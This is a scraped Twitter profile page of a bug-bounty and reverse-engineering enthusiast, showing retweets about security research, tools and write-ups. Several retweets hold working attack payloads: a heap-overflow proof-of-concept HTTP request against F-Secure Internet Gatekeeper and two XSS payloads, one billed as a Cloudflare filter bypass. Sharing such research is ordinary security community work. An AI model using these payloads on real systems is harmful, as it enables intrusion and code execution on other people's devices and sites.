bbakbbak2

@bbakbbak22

I hope be a expensive freelancer. Tweets: web, ios, android, reverse engineering, skills, bugbounty.

Vrijeme pridruživanja: ožujak 2018.

Tweetovi

Blokirali ste korisnika/cu @bbakbbak22

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @bbakbbak22

  1. proslijedio/la je Tweet
    4. velj

    by $12,500 USD Read From The File System Access (potencial RCE) on Whatsapp Desktop (electron)

    Poništi
  2. proslijedio/la je Tweet
    4. velj

    Very useful tool if you are studying Drivers. Also really enjoyed the book: Windows Kernel Programming

    Poništi
  3. proslijedio/la je Tweet
    4. velj
    Poništi
  4. proslijedio/la je Tweet
    4. velj
    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    3. velj

    Takeover story of repo 1.A site having github logo 2. Example: Click on logo it'll show you git repo() 3. In my case , It was 404 Main part 4. Created git account with name of company , So it was like Successful takeover

    Poništi
  6. proslijedio/la je Tweet
    4. velj

    [PoC] Heap Overflow in F-Secure Internet Gatekeeper POST /submit HTTP/1.1 Host: 192.168.0.24:9012 Content-Length: 21487483844 AAAAAAAAAAAAAAAAAAAAAAAAAAA

    Poništi
  7. proslijedio/la je Tweet
    3. velj

    BurpSuite 2020.01 Release Review, Change HTTP Message Editor! New post by , ,

    Poništi
  8. proslijedio/la je Tweet
    2. velj
    Poništi
  9. proslijedio/la je Tweet
    3. velj
    Poništi
  10. proslijedio/la je Tweet
    1. velj

    Here is my massive lib db (for ctfs/wargames/blind pwns etc.). It consists of thousands of libs across over a dozen Linux distributions and architectures spanning the last 20 years. It indexes symbols & gadgets (including one gadgets AKA magic gadgets).

    Poništi
  11. proslijedio/la je Tweet
    2. velj

    Today's study session 👩🏽‍💻💗 - Studying x86 Assembly(It has been a bit tedious not gonna lie) Sometimes I feel stupid lol - Reading more about Reverse Engineering. It's a topic I always liked but was scared to get more into. Does anyone have any Binary Exploitation exercises?

    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    2. velj
    Poništi
  13. proslijedio/la je Tweet
    1. velj
    Poništi
  14. proslijedio/la je Tweet
    31. sij

    Cloudflare XSS Bypass <a"/onmouseover=(confirm)('clodflare-bypass-doskey_history')>click

    Poništi
  15. proslijedio/la je Tweet
    31. sij
    Odgovor korisniku/ci

    Here's another nice one: onerror=eval;throw'=alert\x28document\x2edomain\x29'; :)

    Poništi
  16. proslijedio/la je Tweet
    1. velj

    I was wondering why this guy shine 💫so much? "beautiful people don't come out of nowhere" Totally recommended this interview, specially if you are struggling with mental/emotional issues This is amazing 👏🌈💕 Thank you!

    Poništi
  17. proslijedio/la je Tweet
    30. sij

    I published another blog today. This is a story about an interesting SQL Injection I found. “A Not-So-Blind RCE with SQL Injection” by Prashant Kumar

    Poništi
  18. proslijedio/la je Tweet
    30. sij

    A simple tool to detect wildcards domain based on Amass's wildcards detector. P/s: Thanks for created an awesome tool!

    Poništi
  19. proslijedio/la je Tweet
    31. sij

    S3Enum - Fast Amazon S3 Bucket Enumeration Tool For Pentesters

    Poništi
  20. proslijedio/la je Tweet
    31. sij

    , , and I are starting a new security blog. In our first write-up, we will discuss the impact of "SameSite by default" and how it affects web app sec. Feel free to request future topics you would like us to cover.

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·